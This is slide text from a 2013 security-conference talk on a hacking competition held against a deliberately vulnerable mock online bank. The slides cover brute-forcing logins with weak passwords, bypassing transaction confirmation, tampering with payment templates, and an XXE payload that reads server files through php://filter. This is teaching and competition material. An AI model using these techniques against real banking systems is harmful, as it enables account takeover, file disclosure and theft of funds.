1. $NATCH
Sergey Scherbel & Yuriy Dyachenko
Positive Technologies
Positive Hack Days 2013

2. Some Background
The competition took place for the first time at PHDays 2012.
$natch aims at demonstrating the typical vulnerabilities of
online banking systems.
Positive Technologies performs security tests of online banking
systems on a regular basis. We are really into it.
The most interesting and dangerous vulnerabilities along with
the simply typical weaknesses are integrated into PHDays
iBank.

3. Last Year Results
― 9 participants;
― 4 winners;
― the biggest winnings of 3,500
roubles;
― some winners got into the Positive
community 
;
(after an extremely scary
interview of course).

4. PHDays iBank 2
PHDays iBank 2 is NOT a real online banking system used by
actual banks.
The system was developed exclusively for the PHDays 2013
competition.
PHDays iBank 2 employs the typical vulnerabilities of online
banking systems.

5. Competition Rules
― 100 bank clients;
― 10 participants;
― 20,000 roubles of prize money;
― 1 day for source code analysis;
― 30–40 minutes of the actual competition;
― a participant will get as much money as he/she will manage
to transfer to his/her account;
― the participants can steal money from each other.

6. At Workshop
You will be able:
― to examine each vulnerability in detail;
― to exploit vulnerabilities “by hand”;
― to exploit vulnerabilities with various tools.
Everything is performed on a special copy of the competition
system.

7. Accounts
100001:PKAC1y
100002:RNrlO9
100003:Ndl1Ix
100004:hQPuJw
100005:kpgtCI

8. Authentication
One should enter the CAPTCHA to sign in.

9. Mobile Bank Authentication
No CAPTCHA here, thus the account bruteforce is possible.

10. Accounts with Simple Passwords
100011:password
100012:phdays
100013:qwerty
100014:password
100015:123456
100016:12345
100017:11111
100018:ninja
100019:123123
100020:sex
100021:asdzxc
100022:654321
100023:iloveyou
100024:root
100025:master
100026:superman
...

11. Transaction Confirmation

12. Confirmation Bypass in Mobile Bank

13. Payment Templates Modification

14. Payment Templates Modification
A template is not checked if it is owned by the current user

15. Payment Templates Modification
$$

16. Payment Templates Modification
$$

17. Importing Contacts
Most online banks have a feature that allows one to import/export
data.

18. XML External Entity
Loading of external entities is not disabled.
http://php.net/libxml_disable_entity_loader

19. XML External Entity
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE contact [<!ENTITY x SYSTEM "php://filter/read=convert.base64-
encode/resource=logs/changePassword.log">]>
<contacts>
<contact>
<name>name</name>
<account>90107430600712500003</account>
<description>&x;</description>
</contact>
</contacts>
http://www.php.net/manual/en/wrappers.php.php

20. XML External Entity
File contents in base64

21. Debug Mode

22. Thanks for your attention!
Sergey Scherbel
sscherbel@ptsecurity.ru
Yuriy Dyachenko
ydyachenko@ptsecurity.ru